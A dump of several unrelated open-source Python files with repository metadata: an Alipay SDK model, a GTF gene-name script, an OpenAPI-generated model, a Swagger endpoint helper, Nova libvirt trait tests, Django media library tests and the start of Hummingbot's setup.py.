return self._auth_type
@auth_type.setter
def auth_type(self, value):
self._auth_type = value
@property
def topic(self):
return self._topic
@topic.setter
def topic(self, value):
self._topic = value
def to_alipay_dict(self):
params = dict()
if self.auth_token:
if hasattr(self.auth_token, 'to_alipay_dict'):
params['auth_token'] = self.auth_token.to_alipay_dict()
else:
params['auth_token'] = self.auth_token
if self.auth_type:
if hasattr(self.auth_type, 'to_alipay_dict'):
params['auth_type'] = self.auth_type.to_alipay_dict()
else:
params['auth_type'] = self.auth_type
if self.topic:
if hasattr(self.topic, 'to_alipay_dict'):
params['topic'] = self.topic.to_alipay_dict()
else:
params['topic'] = self.topic
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenAppMessageSubscriptionQueryModel()
if 'auth_token' in d:
o.auth_token = d['auth_token']
if 'auth_type' in d:
o.auth_type = d['auth_type']
if 'topic' in d:
o.topic = d['topic']
return o
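# Hedged usage sketch appended for illustration (not part of the generated
# SDK file): round-trips the model through its dict helpers. All field
# values below are made up.
if __name__ == "__main__":
    demo = AlipayOpenAppMessageSubscriptionQueryModel()
    demo.auth_token = "sample-auth-token"
    demo.auth_type = "SAMPLE_AUTH_TYPE"
    demo.topic = "sample.topic"
    payload = demo.to_alipay_dict()
    print(json.dumps(payload))
    restored = AlipayOpenAppMessageSubscriptionQueryModel.from_alipay_dict(payload)
    print(restored.topic)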
| 26.042254 | 71 | 0.579232 |
4a210292b494220f2ce2625489484193bc562309 | 995 | py | Python | docker/modify-gtf/SetGeneNameToId.py | lilab-bcb/skylab | d230f2d31ba877db58948a9ed73486cd7c71dd59 | ["BSD-3-Clause"] | 45 | 2017-10-12T19:37:29.000Z | 2022-01-22T02:56:57.000Z | docker/modify-gtf/SetGeneNameToId.py | lilab-bcb/skylab | d230f2d31ba877db58948a9ed73486cd7c71dd59 | ["BSD-3-Clause"] | 203 | 2017-08-15T13:50:21.000Z | 2021-02-18T01:20:25.000Z | docker/modify-gtf/SetGeneNameToId.py | truwl/skylab | e31492cd0219ff6f236cd0500401004f16f0fe41 | ["BSD-3-Clause"] | 42 | 2017-09-13T14:44:36.000Z | 2022-03-15T09:27:52.000Z |
#!/usr/bin/env python
import argparse
import re
parser = argparse.ArgumentParser(description="Set the gene_name within a gtf to be equivalent to the values within gene_id.")
parser.add_argument('--in-gtf-file', dest='ingtf', help='input gtf file')
parser.add_argument('--out-gtf-file', dest='outgtf', help='output gtf file')
args = parser.parse_args()
def setGeneNameToId(in_gtf, out_gtf, verbose=True):
with open(in_gtf, 'r') as fpin, open(out_gtf, 'w') as fpout:
for line in fpin:
stripped_line = line.strip()
gene_id = re.search(r'gene_id ([^;]*);', stripped_line)
gene_name = re.search(r'gene_name ([^;]*);', stripped_line)
if gene_id and gene_name:
modified_line = re.sub(r'gene_name ([^;]*);', 'gene_name ' + gene_id.group(1) + ";", stripped_line)
fpout.write(modified_line + '\n')
else:
fpout.write(stripped_line + '\n')
setGeneNameToId(args.ingtf, args.outgtf)
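# Illustrative before/after (not in the original script) for one made-up GTF
# attribute column, showing the substitution performed above:
#   before: gene_id "ENSG00000278267"; gene_name "MIR6859-1";
#   after:  gene_id "ENSG00000278267"; gene_name "ENSG00000278267";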
| 38.269231 | 125 | 0.632161 |
4a2102942a67e64aa942084dd11ea6c462a2a366 | 9,141 | py | Python | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | ["MIT"] | 4 | 2020-02-21T16:30:46.000Z | 2021-01-12T12:22:03.000Z | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | ["MIT"] | 4 | 2019-12-28T19:30:08.000Z | 2020-03-31T19:27:45.000Z | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | ["MIT"] | null | null | null |
# coding: utf-8
"""
OOXML Automation
This API helps users convert Excel and Powerpoint documents into rich, live dashboards and stories. # noqa: E501
The version of the OpenAPI document: 0.1.0-no-tags
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class SharedParagraphDetails(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'text_container_id': 'str',
'text_container': 'SharedTextContainerDetails',
'number': 'int',
'text': 'list[SharedTextDetails]',
'id': 'str',
'date_created': 'datetime',
'user_created': 'str',
'date_modified': 'datetime',
'user_modified': 'str'
}
attribute_map = {
'text_container_id': 'textContainerId',
'text_container': 'textContainer',
'number': 'number',
'text': 'text',
'id': 'id',
'date_created': 'dateCreated',
'user_created': 'userCreated',
'date_modified': 'dateModified',
'user_modified': 'userModified'
}
def __init__(self, text_container_id=None, text_container=None, number=None, text=None, id=None, date_created=None, user_created=None, date_modified=None, user_modified=None): # noqa: E501
"""SharedParagraphDetails - a model defined in OpenAPI""" # noqa: E501
self._text_container_id = None
self._text_container = None
self._number = None
self._text = None
self._id = None
self._date_created = None
self._user_created = None
self._date_modified = None
self._user_modified = None
self.discriminator = None
self.text_container_id = text_container_id
if text_container is not None:
self.text_container = text_container
if number is not None:
self.number = number
self.text = text
if id is not None:
self.id = id
if date_created is not None:
self.date_created = date_created
if user_created is not None:
self.user_created = user_created
if date_modified is not None:
self.date_modified = date_modified
if user_modified is not None:
self.user_modified = user_modified
@property
def text_container_id(self):
"""Gets the text_container_id of this SharedParagraphDetails. # noqa: E501
:return: The text_container_id of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._text_container_id
@text_container_id.setter
def text_container_id(self, text_container_id):
"""Sets the text_container_id of this SharedParagraphDetails.
:param text_container_id: The text_container_id of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._text_container_id = text_container_id
@property
def text_container(self):
"""Gets the text_container of this SharedParagraphDetails. # noqa: E501
:return: The text_container of this SharedParagraphDetails. # noqa: E501
:rtype: SharedTextContainerDetails
"""
return self._text_container
@text_container.setter
def text_container(self, text_container):
"""Sets the text_container of this SharedParagraphDetails.
:param text_container: The text_container of this SharedParagraphDetails. # noqa: E501
:type: SharedTextContainerDetails
"""
self._text_container = text_container
@property
def number(self):
"""Gets the number of this SharedParagraphDetails. # noqa: E501
:return: The number of this SharedParagraphDetails. # noqa: E501
:rtype: int
"""
return self._number
@number.setter
def number(self, number):
"""Sets the number of this SharedParagraphDetails.
:param number: The number of this SharedParagraphDetails. # noqa: E501
:type: int
"""
self._number = number
@property
def text(self):
"""Gets the text of this SharedParagraphDetails. # noqa: E501
:return: The text of this SharedParagraphDetails. # noqa: E501
:rtype: list[SharedTextDetails]
"""
return self._text
@text.setter
def text(self, text):
"""Sets the text of this SharedParagraphDetails.
:param text: The text of this SharedParagraphDetails. # noqa: E501
:type: list[SharedTextDetails]
"""
self._text = text
@property
def id(self):
"""Gets the id of this SharedParagraphDetails. # noqa: E501
:return: The id of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this SharedParagraphDetails.
:param id: The id of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._id = id
@property
def date_created(self):
"""Gets the date_created of this SharedParagraphDetails. # noqa: E501
:return: The date_created of this SharedParagraphDetails. # noqa: E501
:rtype: datetime
"""
return self._date_created
@date_created.setter
def date_created(self, date_created):
"""Sets the date_created of this SharedParagraphDetails.
:param date_created: The date_created of this SharedParagraphDetails. # noqa: E501
:type: datetime
"""
self._date_created = date_created
@property
def user_created(self):
"""Gets the user_created of this SharedParagraphDetails. # noqa: E501
:return: The user_created of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._user_created
@user_created.setter
def user_created(self, user_created):
"""Sets the user_created of this SharedParagraphDetails.
:param user_created: The user_created of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._user_created = user_created
@property
def date_modified(self):
"""Gets the date_modified of this SharedParagraphDetails. # noqa: E501
:return: The date_modified of this SharedParagraphDetails. # noqa: E501
:rtype: datetime
"""
return self._date_modified
@date_modified.setter
def date_modified(self, date_modified):
"""Sets the date_modified of this SharedParagraphDetails.
:param date_modified: The date_modified of this SharedParagraphDetails. # noqa: E501
:type: datetime
"""
self._date_modified = date_modified
@property
def user_modified(self):
"""Gets the user_modified of this SharedParagraphDetails. # noqa: E501
:return: The user_modified of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._user_modified
@user_modified.setter
def user_modified(self, user_modified):
"""Sets the user_modified of this SharedParagraphDetails.
:param user_modified: The user_modified of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._user_modified = user_modified
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SharedParagraphDetails):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
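# Hedged usage sketch appended for illustration (not part of the generated
# client): constructs a paragraph with made-up values and prints its dict form.
if __name__ == "__main__":
    demo = SharedParagraphDetails(
        text_container_id="00000000-0000-0000-0000-000000000000",  # made-up id
        number=1,
        text=[],
    )
    print(demo.to_dict())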
| 28.655172 | 193 | 0.613828 |
4a2102f4272ede7c43a23efd9b875483014ddf6f | 3,648 | py | Python | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | ["MIT"] | null | null | null | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | ["MIT"] | null | null | null | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | ["MIT"] | null | null | null |
from swagger_gen.lib.utils import element_at, not_null
from swagger_gen.lib.constants import Method
from werkzeug.routing import Rule
from typing import List
class SwaggerEndpoint:
def __init__(self, rule: Rule):
not_null(rule, 'rule')
self._rule = rule
@property
def view_function_name(self):
''' The name of the method that defines the route '''
return self._rule.endpoint
@property
def methods(self):
''' The allowed methods on the route '''
return self._get_methods()
@property
def component_key(self) -> str:
'''Key linking the path and the component in the spec'''
return self._get_view_name()
@property
def endpoint_literal(self) -> str:
''' The endpoint name to display on the Swagger page '''
return self._format_route_literal()
@property
def segment_params(self):
'''URL segment parameters'''
return self._rule.arguments
@property
def tag(self):
''' The section name that groups the endpoints in the Swagger UI '''
return self._get_endpoint_tag()
def _get_view_name(self) -> str:
'''Get the formatted view name, removing blueprint prefixes'''
not_null(self._rule.endpoint, 'endpoint')
segments = self._rule.endpoint.split('.')
if len(segments) > 1:
return segments[1]
return self._rule.endpoint
def _get_endpoint_tag(self) -> str:
'''
Get the endpoint tag. The tag becomes the title of the group of
endpoints sharing a common base path.
When generating documentation dynamically from the app routes,
the only thing we have to go with w/r/t grouping endpoints together
is the base segment of the URL. As a result, if the base segment
is the same for every endpoint, they'll all be grouped under one
section. A common scenario is an /api prefix on the route. So to
avoid this (specific scenario) we'll strip off the /api prefix if
it exists
TODO: Expose a parameter on `swagger_metadata` to pass in a specific
tag in the event we want to override the automatic tag for something
more specific, etc
'''
endpoint_segments = self._rule.rule.split('/')
tag_position = 1
if element_at(endpoint_segments, 1) == 'api':
tag_position = 2
# Get the tag segment from the index of the segment list
endpoint_tag = element_at(
_iterable=endpoint_segments,
index=tag_position)
if not endpoint_tag:
raise Exception(
f'Failed to parse tag from endpoint: {self._rule.rule}')
return endpoint_tag
def _format_route_literal(self) -> str:
'''
        Swap angle brackets for curly braces in the endpoint parameters.
        Flask routes enclose route segments in angle brackets, but Swagger UI
        needs the segments to be enclosed in curly braces.

        Flask: `<order_id>`
        Swagger: `{order_id}`
'''
route = self._rule.rule
not_null(route, 'route')
if '<' in route:
route = (route.replace(
'<', '{').replace(
'>', '}')
)
return route
def _get_methods(self) -> List[str]:
'''Get display methods, ignoring OPTIONS and HEAD'''
return ([
method for method in self._rule.methods
if method not in [
Method.OPTIONS,
Method.HEAD]
])
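    # Hedged example (not part of the library): given a werkzeug Rule such as
    # Rule('/api/orders/<order_id>', endpoint='orders.get_order'), an instance
    # of SwaggerEndpoint would expose, per the properties above:
    #   endpoint_literal -> '/api/orders/{order_id}'
    #   tag              -> 'orders'    (the '/api' prefix is skipped)
    #   component_key    -> 'get_order' (blueprint prefix stripped)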
| 30.915254 | 77 | 0.609101 |
4a2103b5cec4d623eb06a0fd0eec7b2d7b426ee3 | 9,086 | py | Python | nova/tests/functional/libvirt/test_report_cpu_traits.py | maya2250/nova | e483ca1cd9a5db5856f87fc69ca07c42d2be5def | ["Apache-2.0"] | null | null | null | nova/tests/functional/libvirt/test_report_cpu_traits.py | maya2250/nova | e483ca1cd9a5db5856f87fc69ca07c42d2be5def | ["Apache-2.0"] | 1 | 2020-11-05T17:42:24.000Z | 2020-11-05T17:42:24.000Z | nova/tests/functional/libvirt/test_report_cpu_traits.py | Mattlk13/nova | 5b13eb59540aaf535a53920e783964d106de2620 | ["Apache-2.0"] | 1 | 2020-07-22T22:14:40.000Z | 2020-07-22T22:14:40.000Z |
# Copyright (c) 2018 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import os_resource_classes as orc
import os_traits as ost
from nova import conf
from nova.db import constants as db_const
from nova import test
from nova.tests.functional.libvirt import integrated_helpers
from nova.tests.unit.virt.libvirt import fakelibvirt
from nova.virt.libvirt.host import SEV_KERNEL_PARAM_FILE
CONF = conf.CONF
class LibvirtReportTraitsTestBase(
integrated_helpers.LibvirtProviderUsageBaseTestCase):
def assertMemEncryptionSlotsEqual(self, slots):
inventory = self._get_provider_inventory(self.host_uuid)
if slots == 0:
self.assertNotIn(orc.MEM_ENCRYPTION_CONTEXT, inventory)
else:
self.assertEqual(
inventory[orc.MEM_ENCRYPTION_CONTEXT],
{
'total': slots,
'min_unit': 1,
'max_unit': 1,
'step_size': 1,
'allocation_ratio': 1.0,
'reserved': 0,
}
)
class LibvirtReportTraitsTests(LibvirtReportTraitsTestBase):
def test_report_cpu_traits(self):
self.assertEqual([], self._get_all_providers())
self.start_compute()
# Test CPU traits reported on initial node startup, these specific
# trait values are coming from fakelibvirt's baselineCPU result.
# COMPUTE_NODE is always set on the compute node provider.
traits = self._get_provider_traits(self.host_uuid)
for trait in ('HW_CPU_X86_VMX', 'HW_CPU_X86_AESNI', 'COMPUTE_NODE'):
self.assertIn(trait, traits)
self._create_trait('CUSTOM_TRAITS')
new_traits = ['CUSTOM_TRAITS', 'HW_CPU_X86_AVX']
self._set_provider_traits(self.host_uuid, new_traits)
# The above is an out-of-band placement operation, as if the operator
# used the CLI. So now we have to "SIGHUP the compute process" to clear
# the report client cache so the subsequent update picks up the change.
self.compute.manager.reset()
self._run_periodics()
# HW_CPU_X86_AVX is filtered out because nova-compute owns CPU traits
# and it's not in the baseline for the host.
traits = set(self._get_provider_traits(self.host_uuid))
expected_traits = self.expected_libvirt_driver_capability_traits.union(
[u'HW_CPU_X86_VMX', u'HW_CPU_X86_AESNI', u'CUSTOM_TRAITS',
# The periodic restored the COMPUTE_NODE trait.
u'COMPUTE_NODE']
)
self.assertItemsEqual(expected_traits, traits)
class LibvirtReportNoSevTraitsTests(LibvirtReportTraitsTestBase):
STUB_INIT_HOST = False
@test.patch_exists(SEV_KERNEL_PARAM_FILE, False)
def setUp(self):
super(LibvirtReportNoSevTraitsTests, self).setUp()
self.start_compute()
def test_sev_trait_off_on(self):
"""Test that the compute service reports the SEV trait in the list of
global traits, but doesn't immediately register it on the
compute host resource provider in the placement API, due to
the kvm-amd kernel module's sev parameter file being (mocked
as) absent.
Then test that if the SEV capability appears (again via
mocking), after a restart of the compute service, the trait
gets registered on the compute host.
Also test that on both occasions, the inventory of the
MEM_ENCRYPTION_CONTEXT resource class on the compute host
corresponds to the absence or presence of the SEV capability.
"""
self.assertFalse(self.compute.driver._host.supports_amd_sev)
sev_trait = ost.HW_CPU_X86_AMD_SEV
global_traits = self._get_all_traits()
self.assertIn(sev_trait, global_traits)
traits = self._get_provider_traits(self.host_uuid)
self.assertNotIn(sev_trait, traits)
self.assertMemEncryptionSlotsEqual(0)
# Now simulate the host gaining SEV functionality. Here we
# simulate a kernel update or reconfiguration which causes the
# kvm-amd kernel module's "sev" parameter to become available
# and set to 1, however it could also happen via a libvirt
# upgrade, for instance.
sev_features = \
fakelibvirt.virConnect._domain_capability_features_with_SEV
with test.nested(
self.patch_exists(SEV_KERNEL_PARAM_FILE, True),
self.patch_open(SEV_KERNEL_PARAM_FILE, "1\n"),
mock.patch.object(fakelibvirt.virConnect,
'_domain_capability_features',
new=sev_features)
) as (mock_exists, mock_open, mock_features):
# Retrigger the detection code. In the real world this
# would be a restart of the compute service.
self.compute.driver._host._set_amd_sev_support()
self.assertTrue(self.compute.driver._host.supports_amd_sev)
mock_exists.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
mock_open.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
# However it won't disappear in the provider tree and get synced
# back to placement until we force a reinventory:
self.compute.manager.reset()
self._run_periodics()
traits = self._get_provider_traits(self.host_uuid)
self.assertIn(sev_trait, traits)
# Sanity check that we've still got the trait globally.
self.assertIn(sev_trait, self._get_all_traits())
self.assertMemEncryptionSlotsEqual(db_const.MAX_INT)
class LibvirtReportSevTraitsTests(LibvirtReportTraitsTestBase):
STUB_INIT_HOST = False
@test.patch_exists(SEV_KERNEL_PARAM_FILE, True)
@test.patch_open(SEV_KERNEL_PARAM_FILE, "1\n")
@mock.patch.object(
fakelibvirt.virConnect, '_domain_capability_features',
new=fakelibvirt.virConnect._domain_capability_features_with_SEV)
def setUp(self):
super(LibvirtReportSevTraitsTests, self).setUp()
self.flags(num_memory_encrypted_guests=16, group='libvirt')
self.start_compute()
def test_sev_trait_on_off(self):
"""Test that the compute service reports the SEV trait in the list of
global traits, and immediately registers it on the compute
host resource provider in the placement API, due to the SEV
capability being (mocked as) present.
Then test that if the SEV capability disappears (again via
mocking), after a restart of the compute service, the trait
gets removed from the compute host.
Also test that on both occasions, the inventory of the
MEM_ENCRYPTION_CONTEXT resource class on the compute host
corresponds to the absence or presence of the SEV capability.
"""
self.assertTrue(self.compute.driver._host.supports_amd_sev)
sev_trait = ost.HW_CPU_X86_AMD_SEV
global_traits = self._get_all_traits()
self.assertIn(sev_trait, global_traits)
traits = self._get_provider_traits(self.host_uuid)
self.assertIn(sev_trait, traits)
self.assertMemEncryptionSlotsEqual(16)
# Now simulate the host losing SEV functionality. Here we
# simulate a kernel downgrade or reconfiguration which causes
# the kvm-amd kernel module's "sev" parameter to become
# unavailable, however it could also happen via a libvirt
# downgrade, for instance.
with self.patch_exists(SEV_KERNEL_PARAM_FILE, False) as mock_exists:
# Retrigger the detection code. In the real world this
# would be a restart of the compute service.
self.compute.driver._host._set_amd_sev_support()
self.assertFalse(self.compute.driver._host.supports_amd_sev)
mock_exists.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
# However it won't disappear in the provider tree and get synced
# back to placement until we force a reinventory:
self.compute.manager.reset()
self._run_periodics()
traits = self._get_provider_traits(self.host_uuid)
self.assertNotIn(sev_trait, traits)
# Sanity check that we've still got the trait globally.
self.assertIn(sev_trait, self._get_all_traits())
self.assertMemEncryptionSlotsEqual(0)
| 41.488584 | 79 | 0.678186 |
4a21043ab9dd1485c8ef18122db858cc94b7066b | 3,782 | py | Python | media_library/tests/models_tests.py | bitlabstudio/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | ["MIT"] | 1 | 2021-01-13T17:37:54.000Z | 2021-01-13T17:37:54.000Z | media_library/tests/models_tests.py | bitmazk/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | ["MIT"] | null | null | null | media_library/tests/models_tests.py | bitmazk/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | ["MIT"] | null | null | null |
"""Tests for the models of the ``media_library`` app."""
from django.test import TestCase
from user_media.models import UserMediaImage
from user_media.tests.factories import UserMediaImageFactory
from . import factories
class MediaLibraryTestCase(TestCase):
"""Tests for the ``MediaLibrary`` model class."""
longMessage = True
def setUp(self):
self.library = factories.MediaLibraryFactory()
def test_instantiation(self):
self.assertTrue(self.library.pk)
def test_media_images(self):
image = factories.MediaItemFactory(
image=UserMediaImageFactory(),
library=self.library,
video=None,
)
factories.MediaItemFactory(library=self.library)
self.assertEqual(
self.library.media_images().count(), 1, msg=(
'``media_images`` should return only one item.'
)
)
self.assertEqual(
self.library.media_images()[0], image, msg=(
'``media_images`` should return the created image.'
)
)
def test_media_videos(self):
factories.MediaItemFactory(
image=UserMediaImageFactory(),
library=self.library,
video=None,
)
video = factories.MediaItemFactory(library=self.library)
self.assertEqual(
self.library.media_videos().count(), 1, msg=(
'``media_videos`` should return only one item.'
)
)
self.assertEqual(
self.library.media_videos()[0], video, msg=(
'``media_videos`` should return the created video.'
)
)
class MediaItemTestCase(TestCase):
"""Tests for the ``MediaItem`` model class."""
longMessage = True
def assertNotRaises(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as ex:
self.fail(msg=(
'"{0}" should not have raised an exception, but raised'
' "{1}"'.format(repr(func), str(ex))
))
def setUp(self):
self.library = factories.MediaLibraryFactory()
self.mediaitem = factories.MediaItemFactory(
showreel=self.library,
video='https://youtube.com/watch?v=123456',
)
self.umedia_image = UserMediaImageFactory()
self.mediaitemimage = factories.MediaItemFactory(
video=None, image=self.umedia_image,
)
def test_delete(self):
self.mediaitemimage.delete()
self.assertEqual(UserMediaImage.objects.count(), 0, msg=(
'The user media images should have been deleted as well.'
))
def test_instantiation(self):
self.assertTrue(self.mediaitem.pk)
def test_video_id(self):
self.assertEqual(self.mediaitem.video_id, '123456', msg=(
'The property should have returned the correct video id.'
))
def test_clean(self):
linklist = [
'http://www.youtube.com/watch?v=-JyZLS2IhkQ',
'https://www.youtube.com/watch?v=-JyZLS2IhkQ',
'http://www.youtube.de/watch?v=-JyZLS2IhkQ',
'https://youtube.com/watch?v=-JyZLS2IhkQ',
('https://www.youtube.com/watch?v=PguLNvCcOHQ'
'&list=RDPguLNvCcOHQ#t=0'),
'http://youtu.be/PguLNvCcOHQ?list=RDPguLNvCcOHQ ',
'http://vimeo.com/channels/staffpicks/110140870',
'http://vimeo.com/59777392',
'http://vimeo.com/video/59777392',
('http://vimeo.com/groups/thedirectorofphotography/'
'videos/110016243'),
]
for link in linklist:
self.mediaitem.video = link
self.assertNotRaises(self.mediaitem.clean)
| 33.469027 | 71 | 0.589635 |
4a2104d9f87334697b3d34823c513688abebce88 | 2,532 | py | Python | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | ["BSD-3-Clause"] | 5 | 2019-05-16T09:51:29.000Z | 2021-05-31T09:30:03.000Z | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | ["BSD-3-Clause"] | 107 | 2019-05-24T12:19:02.000Z | 2022-03-23T15:05:56.000Z | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | ["BSD-3-Clause"] | 3 | 2020-08-14T11:01:17.000Z | 2022-01-08T17:32:19.000Z |
import persistent
import BTrees
import zope.annotation
import zope.component
import zope.interface
import zope.container.contained
import zope.app.keyreference.interfaces
import zeit.cms.content.property
import zeit.cms.repository.interfaces
import zeit.cms.workingcopy.interfaces
import zeit.cms.syndication.interfaces
@zope.component.adapter(zeit.cms.workingcopy.interfaces.IWorkingcopy)
@zope.interface.implementer(
zeit.cms.syndication.interfaces.IMySyndicationTargets)
class MySyndicationTargets(persistent.Persistent,
zope.container.contained.Contained):
default_targets = (
'http://xml.zeit.de/hp_channels/r07_hp_aufmacher',
'http://xml.zeit.de/hp_channels/r07_hp_knopf',
'http://xml.zeit.de/hp_channels/channel_news',
'http://xml.zeit.de/hp_channels/channel_magazin',
'http://xml.zeit.de/hp_channels/channel_exklusiv_reform.xm',
'http://xml.zeit.de/deutschland/channel_deutschland',
'http://xml.zeit.de/international/channel_international',
'http://xml.zeit.de/meinung/channel_meinung',
'http://xml.zeit.de/wirtschaft/channel_wirtschaft',
'http://xml.zeit.de/wissen/channel_wissen',
'http://xml.zeit.de/kultur/channel_kultur',
'http://xml.zeit.de/leben/channel_leben',
'http://xml.zeit.de/bildung/channel_bildung',
'http://xml.zeit.de/musik/channel_musik',
)
def __init__(self):
self.targets = BTrees.family32.OI.TreeSet()
        self._initialize_defaults()
def add(self, feed):
self.targets.insert(
zope.app.keyreference.interfaces.IKeyReference(feed))
def remove(self, feed):
try:
self.targets.remove(
zope.app.keyreference.interfaces.IKeyReference(feed))
except KeyError:
pass
def __contains__(self, feed):
return (zope.app.keyreference.interfaces.IKeyReference(feed)
in self.targets)
def __iter__(self):
for keyref in self.targets:
try:
yield keyref()
except KeyError:
pass
    def _initialize_defaults(self):
repository = zope.component.getUtility(
zeit.cms.repository.interfaces.IRepository)
for id in self.default_targets:
try:
feed = repository.getContent(id)
except KeyError:
continue
self.add(feed)
targetFactory = zope.annotation.factory(MySyndicationTargets)
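# Hedged usage sketch (not part of the original module): inside a running
# Zope instance the annotation adapter above would be used roughly like this;
# `workingcopy` and `feed` are assumed to be supplied by the application.
#   targets = zeit.cms.syndication.interfaces.IMySyndicationTargets(workingcopy)
#   targets.add(feed)
#   assert feed in targets
#   targets.remove(feed)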
| 32.050633 | 69 | 0.662322 |
4a2104f38464d32a31195b16051efd4f61ba1806 | 4,673 | py | Python | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | ["Apache-2.0"] | 2 | 2020-10-06T15:00:31.000Z | 2021-03-05T16:37:39.000Z | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | ["Apache-2.0"] | null | null | null | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
from setuptools import setup
from Cython.Build import cythonize
import numpy as np
import os
import subprocess
import sys
is_posix = (os.name == "posix")
if is_posix:
os_name = subprocess.check_output("uname").decode("utf8")
if "Darwin" in os_name:
os.environ["CFLAGS"] = "-stdlib=libc++ -std=c++11"
else:
os.environ["CFLAGS"] = "-std=c++11"
def main():
cpu_count = os.cpu_count() or 8
version = "20201123"
packages = [
"hummingbot",
"hummingbot.client",
"hummingbot.client.command",
"hummingbot.client.config",
"hummingbot.client.ui",
"hummingbot.core",
"hummingbot.core.data_type",
"hummingbot.core.event",
"hummingbot.core.management",
"hummingbot.core.utils",
"hummingbot.data_feed",
"hummingbot.logger",
"hummingbot.market",
"hummingbot.connector",
"hummingbot.connector.connector",
"hummingbot.connector.connector.balancer",
"hummingbot.connector.exchange",
"hummingbot.connector.exchange.binance",
"hummingbot.connector.exchange.bitfinex",
"hummingbot.connector.exchange.bittrex",
"hummingbot.connector.exchange.bamboo_relay",
"hummingbot.connector.exchange.coinbase_pro",
"hummingbot.connector.exchange.huobi",
"hummingbot.connector.exchange.radar_relay",
"hummingbot.connector.exchange.kraken",
"hummingbot.connector.exchange.crypto_com",
"hummingbot.connector.exchange.kucoin",
"hummingbot.connector.exchange.loopring",
"hummingbot.connector.exchange.okex",
"hummingbot.connector.derivative",
"hummingbot.connector.derivative.binance_perpetual",
"hummingbot.script",
"hummingbot.strategy",
"hummingbot.strategy.amm_arb",
"hummingbot.strategy.arbitrage",
"hummingbot.strategy.cross_exchange_market_making",
"hummingbot.strategy.pure_market_making",
"hummingbot.strategy.perpetual_market_making",
"hummingbot.templates",
"hummingbot.wallet",
"hummingbot.wallet.ethereum",
"hummingbot.wallet.ethereum.uniswap",
"hummingbot.wallet.ethereum.watcher",
"hummingbot.wallet.ethereum.zero_ex",
]
package_data = {
"hummingbot": [
"core/cpp/*",
"wallet/ethereum/zero_ex/*.json",
"wallet/ethereum/token_abi/*.json",
"wallet/ethereum/erc20_tokens.json",
"wallet/ethereum/erc20_tokens_kovan.json",
"VERSION",
"templates/*TEMPLATE.yml"
],
}
install_requires = [
"aioconsole",
"aiokafka",
"attrdict",
"cytoolz",
"eth-abi",
"eth-account",
"eth-bloom",
"eth-hash",
"eth-keyfile",
"eth-keys",
"eth-rlp",
"eth-utils",
"hexbytes",
"kafka-python",
"lru-dict",
"parsimonious",
"pycryptodome",
"requests",
"rlp",
"toolz",
"tzlocal",
"urllib3",
"web3",
"websockets",
"aiohttp",
"async-timeout",
"attrs",
"certifi",
"chardet",
"cython==0.29.15",
"idna",
"idna_ssl",
"multidict",
"numpy",
